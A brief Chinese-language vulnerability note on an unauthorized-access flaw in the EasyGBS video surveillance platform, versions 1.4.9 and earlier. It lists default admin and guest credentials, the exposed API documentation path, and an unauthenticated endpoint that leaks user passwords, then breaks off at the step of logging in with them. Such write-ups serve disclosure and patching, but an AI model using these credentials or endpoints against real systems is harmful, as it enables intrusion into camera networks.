一、漏洞详情
EasyGBS是由TSINGSEE开发一款国标视频云平台。EasyGBS<=1.4.9版本的平台存在未授权访问漏洞,攻击者可以直接访问平台的API接口文档,从而获取系统的API接口造成信息泄露。
二、影响版本
EasyGBS <= 1.4.9
三、漏洞利用
1、默认口令:
easygbs/easygbs # 管理员权限
guest2020/guest2014&2020 # 游客权限
2、API接口文档:/apidoc/#api-device
3、用户账户密码信息泄露:/api/v1/userlist?pageindex=0&pagesize=10
4、利用泄露的用户信息,登陆视频监控系统: